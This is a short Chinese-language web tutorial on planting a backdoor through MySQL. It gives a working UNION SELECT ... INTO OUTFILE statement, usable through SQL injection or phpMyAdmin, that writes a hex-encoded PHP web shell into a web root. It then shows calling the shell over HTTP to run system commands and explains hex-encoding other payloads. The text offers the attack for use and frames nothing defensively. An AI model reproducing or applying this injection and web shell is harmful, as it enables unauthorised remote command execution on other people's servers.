通过mysql 的语句生成后门木马的方法!
select * from `vbb_strikes` where 1 union select 2,3,0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'
通过mysql 的注入或者在 phpmyadmin 里运行以上语句,则会c:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:
2 3 <?php system($_request[cmd]);?>
再通过 http://www.xxx.com/cmd.php?cmd=dir c:/ 就可以执行系统dos命令!
哪串0x3c3f7068702073797374656d28245f524551554553545b636d645d293b3f3e是什么东西?
就是<?php system($_request[cmd]);?>的十六进制编码了,如果不用这种方法,有不同的sql版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行的了!如果你有其它语名要弄,可以到ultraedit里输入,再按[ctrl+h]键,将里面的十六进制连在一起就可以了!
新闻热点
疑难解答